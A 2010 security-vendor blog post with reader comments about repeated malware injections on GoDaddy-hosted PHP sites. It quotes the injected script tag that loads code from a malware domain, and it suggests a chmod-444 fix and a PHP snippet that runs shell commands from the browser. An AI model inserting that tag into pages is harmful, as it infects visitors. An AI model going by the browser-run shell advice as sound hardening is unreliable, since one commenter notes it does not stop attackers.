Here we go again – Problem at GoDaddy continues

Update from GoDaddy: Less than 200 accounts hacked this morning as they were able to contain it before it spread. On their own words:

Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.

Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you, Todd Redfoot, Chief Information Security Officer

Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.

< script src=”http://losotrana.com/js.php”></script>

It seems to be happening as of now, since our scanner just started to alert our customers.

Is your site exploited? Our script will fix it again: Simple Cleanup Solution

Details? Everything is the same as: Attacks Continue on GoDaddy

Are you a GoDaddy customer? Call them and demand a fix, seriously!

If you still need help, please contact us: support@sucuri.net.

BIG Bonus: We noticed that on the sites where we set all the permissions to read-only were not affected. Their script do not check the permissions, so if you “chmod 444″ on all your PHP files you will be safe against this attack (444 = read-only permissions for everyone).

A simple script to do that would be: find ./ -name “*.php” -type f| xargs chmod 444

BIG Bonus #2: GoDaddy’s FTP server are down for a few hosts. Very helpful for people trying to fix their sites.

As always, if you are having difficulties getting your site cleanup, send us an email at support@sucuri.net or visit our site: Sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Anonymous

    Hello,

    Configured file monitor plugin for wordpress.

    I got the following again today for my GoDaddy Hosting account:

    This email is to alert you of the following changes to the file system of your website at http://www.******.com
    Timestamp: Thu, 20 May 2010 13:57:20 +0000

    Added:
    berkeley_ellary.php

    I checked that file but was empty and after a couple of minutes removed. Hopefully my files didn't get changed for third time.

    Let's see whats going on.

  • Anonymous

    Sheesh, and I thought things we're bad when I retired from Tech in 02 because no one was paying attention or listening anymore.

  • Anonymous

    Got a client running drupal on godaddy servers. Not a problem so far. Wonder if this is limited to wordpress installs?

  • Anonymous

    Thanks a lot for keeping this blog up to date. That script works every time!

  • Anonymous

    Seriously someone needs to come up with software that firewalls, scans, and cleans for these platforms.

    Norton WordPress Protection or something.

  • Anonymous

    Pardon my ignorance, but how does one actually perform this operation:

    >> A simple script do to that would be: find ./ -name "*.php" -type f| xargs chmod 444 < <

    That is, if the site is hosted on Go Daddy, how can I invoke that script? Is it through their hosting center or via FTP?

  • http://www.wheresmydrink.com Scott

    I second his question!!!!!!!!!!!!!

    Pardon my ignorance, but how does one actually perform this operation:

    >> A simple script do to that would be: find ./ -name "*.php" -type f| xargs chmod 444 < <

    That is, if the site is hosted on Go Daddy, how can I invoke that script? Is it through their hosting center or via FTP?

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Scott, Anonymous:

    Create a PHP script with the following:

    < ?php
    $command = `find ./ -name "*.php" -type f| xargs chmod 444`;
    ?>

    Then go to your browser and execute it…

  • John

    If we change all permissions on PHP files to 444, how will that affect WordPress? Will we be able to upload files, edit the files when logged into our dashboard, etc?

  • http://www.blogger.com/profile/05877671849645884790 Peter

    @anonymous:

    "
    Got a client running drupal on godaddy servers. Not a problem so far. Wonder if this is limited to wordpress installs?
    "

    No, it affects all .php CMS. My Drupal site was hacked during the first hacking spree, and several times after that.

    P.

  • FOL

    What John said:

    Will this affect the site in anyway?

  • http://www.blogger.com/profile/09461530513715661711 Singha

    I am on Bluehost and got hit with this attack yesterday night. I have two Tikiwiki groupware sites and two Drupal sites. I'm trying to use the fix mentioned here, but despite it running to completion, it is not stripping any of the bad code out of the php files. Unfortunately, I can't access my Bluehost Control Panel to uninstall any of my sites and do fresh installs because it keeps timing out (maybe too many people trying to do just that on their hacked sites?). So this is not just a NetSol or GoDaddy problem.

  • http://www.w3basis.de/ Bernhard

    Dear Folks,
    if PHP on your host is allowed to invoke find,xargs and chmod – what else is it allowed to do?

    Since everything started with PHP scripts "magically" appearing and disappearing within peoples shares, it would appear that directories on your host are world writeable. Possibly set to 777 to accomodate some CMS's web-admin panels (Joomla! comes to mind).

    Putting your file permissions to read-only won't solve the problem, as long as anybody can drop a PHP script into your directories and reverse your chmod.

  • http://www.blogger.com/profile/00235020915895646158 webbcity

    What John and FOL said above…I'm standing by, ready to run this '444' script but am worried that it will make the pages uneditable by WordPress…is that the case?

  • Anonymous

    I have no problems with my wordpress pages after change permissions to 444.

    The only thing is that you can´t edit your template…

  • http://www.blogger.com/profile/00235020915895646158 webbcity

    Thanks Anonymous! Not worried about the template part for now, that's not going to change any time soon.

  • John

    (in reply to 444)… what about file uploads using the WordPress image uploader?

    What about uploading and installing plugins? Or deactivating plugins?

    Maybe I should just create a temp blog and try it.

    However, for some reason I'm a bit skeptical changing permissions to 444 will solve anything. It seems these hacks are coming through the server side.

  • Anonymous

    My site was hacked again… I do not run WordPress or Joomla. I am on shared linux hosting. This is really frustrating.

    5th time this has happened. I changed all of my PHP files to READ ONLY…hope this helps…

  • John

    @sucuri.net – I love what you're doing here helping people know there's a hacking problem and how they can clean up the issues.

    But to be fair, it would be good to also mention how other hosts are *continually* getting hacked as well.

    For some reason, everyone is picking on Go Daddy, but the problem is with other hosts like Bluehost. See here:

    http://bluehostforums.com/showthread.php?t=20572

    I don't work for Go Daddy, am just a customer and I guess just as a business owner myself I hate to see Go Daddy getting blamed so hard and lose customers because everyone keeps blogging about how "Go Daddy was hacked again".

    Then these customers move to hosts like Bluehost under the false impression it's different there.

    Again, love what you're doing here and I'm a fan, just would like to see awareness more that this is happening in general to other hosts and it's not just Go Daddy. Turns out, Go Daddy is telling the truth about this being other host's problem too and to be honest, they are correct, it's not helpful to publish what hackers are doing with publishing their code.

  • Anonymous

    Why John, why is it not helpful? Do you think the hackers don't know what they themselves are doing? What does it tell them that they don't already know? …But it tells us a LOT of what we don't already know!

    I also take issue with your defense of GoDaddy. To me it's not that they're the only ones – it's really how they've terribly and ineptly handled the whole thing IMO (for months) and how they've tried to shift all blame and responspbility (erroneously) to the CUSTOMER! Unbelievable, textbook study of how to do it the WRONG way.

  • Bourgy

    444 might mess with your sitemap if you're using a WordPress plugin

  • Anonymous

    I haven't had problems uploadind photos, in my sitemap, with my plugins after change permissions to 444 in wordpress php files

  • John

    @Anonymous – Replies to your two points:

    First part:

    Why it's not helpful? I suppose to some extent it is helpful for people like us to take a look at it and dissect how it works, but it's also counter productive because for every 1 hacker who knows how to write and execute code like this, there are 50 who don't and want to learn and grow.

    This helps them do that.

    For the most part, I would think all most people need to know is what's happening and how they need to prevent it from happening again. Giving away too much information is teaching young wannabe's.

    It's kind of like how to create a dirty bomb. Would you want that information freely spread all over the Internet for everyone to see, or would you rather those kinds of details be bottled up and all we need to know is how to protect ourselves? …. Just an analogy.

    Re: Go Daddy

    You're spot on with how they are handling it with customers and pushing blame elsewhere. They definitely do need to own up to this. In that regard, I couldn't imagine telling my customers it's their problem when in reality it's mine. They have tunnel vision.

    I was just trying to make the point that if we are going to be *aware* of what's going on, we need to tell it all and not just focus on one company.

    Take a look at the title to this article.

    Shouldn't it be "Another round of hacks attack hosting companies but guess who's still shifting responsibility?"

    A bit long, but get my point?

  • Anonymous

    John, thank you for your response. I will say that I don't think any new hackers have been created by reading this blog. I think the attacks continue to be perpetuated by the same (professional) individuals, using the same (sophisticated) modus operandi. GoDaddy themselves (and others) still cannot figure it out, so given the complexity, I don't think anything shared here is really going to "spread" it.

    On the other hand, I can say with absolute certainty that I and my blogs have benefited from the actual details and specifics of the attacks that have been shared here. That is indisputable to me, and as a result I am much better prepared to both defend as well as repair from attacks. And if everybody becomes more knowledgeable about what is happening and how, the attacks themselves in their present form become far less relevant and impactful.

    So yes, I will absolutely take the certainty of the second benefit over the speculation of the first possibility.

  • http://www.blogger.com/profile/07124910946333260861 Dan Allen

    BACKGROUND: Setting up wordpress-fix.php to run via Cron on Godaddy.

    PROBLEM: Since the fix is a php file, it is vulnerable to attack, just like the rest of the php files.

    QUESTION: How you run the fix via Cron on Godaddy without the fix script getting hacked?

    As always, comments and suggestions are extremely much appreciated.

    Best regards,
    Dan Allen
    Montpelier, Vermont

    p.s. Our site editor is a non-tech professional writer. She researched this attack and wrote a great account, maybe better than any of us techies could write.
    http://vtdigger.org/2010/05/19/digger-dirt-vtdigger-org-survives-virus-attack/

  • Anonymous

    This morning i have another hacker intrusion in my godaddy account:

    Log of wordpress file monitor:

    "This email is to alert you of the following changes to the file system of your website
    Timestamp: Sun, 23 May 2010 07:21:51 +0200

    Added:
    jeremias_scene.php"

    Problem continues….

  • http://www.davidecanali.com dcanali

    I contacted Godaddy saying that I could contribute them with a bunch of information I captured, showing the status of the system (running processes, currently logged in users) at the time of infection. All I received, after 24hrs, was an automated response saying that they "verified that my website was targeted by an attack and they have successfully removed the malicious code" (actually I had already cleaned up everything). This is really lame…

  • http://www.blogger.com/profile/00235020915895646158 webbcity

    My friend said his site was hacked again this morning… Is there some easy way to check and see if this actually happened? He has been running the cleanup script, and we also changed all files to 444. Anyone else get hacked this morning?

  • JohnR

    Just hacked again! GoDaddy STILL does not have it figured out! A new rogue PHP file appeared in my root directory this afternoon. The last time this happened was May 20th, the date of this post at Sucuri.

    I naturally figured that as things had gotten pretty quiet here and elsewhere, so that maybe GoDaddy had finally figured it out. But no, it's still happening! Today just proved convincingly that I need to move hosts, finally, and fast.

    Changing all the passwords and security settings in the world previously didn't make a difference, but we did it again anyway. Until and unless GoDaddy ever gets a clue on how to stop this on their end, all the blind hope in the world won't make a bit of difference…

    Has anybody else here had a new attack? David, have you heard anything? Thanks, and thank heavens for Sucuri.

    • http://www.davidecanali.com dcanali

      just had the same attack. A file named atlantic_derrick.php was created on my hosting directory, and executed.

      I found out that someone (probably the godaddy security guys) put the following php code in /home/content/protect.php, to protect against the attacks (that in past used a function named inject_in_folder():

      function inject_in_folder($dir){}

      So I guess this is their great solution to the problem (so you can’t just re-declare it in your scripts) :/

      • JohnR

        Thank you, so it's not an isolated incident and there will no doubt be others… The puzzling thing is I tracked out the series of attacks since April 15th on my calendar, and it appears they are coming every 2.5 weeks, almost like clockwork…

        It's a travesty that despite everything over the past two months, GoDaddy is still appearing helpless to stop it, only to try to react. I have had my fill of what appears to be continued incompetence and will be moving all sites this weekend to HostGator.

  • http://twitter.com/whostingreview Web Hosting Review

    All my pages got hacked for 2 months straight. I finally got fed up with it and switched. They could have cared less. Kind of odd because I run a web hosting review site! I would have some random php code that was a mile long installed on all my files. GoDaddy told me it was my problem not theirs! Well, I am not their customer no more so I guess those words have spoken for themselves.

    This Godaddy review pretty much sums it up!
    http://www.the-best-web-hosting-service.com/godaddy-review.php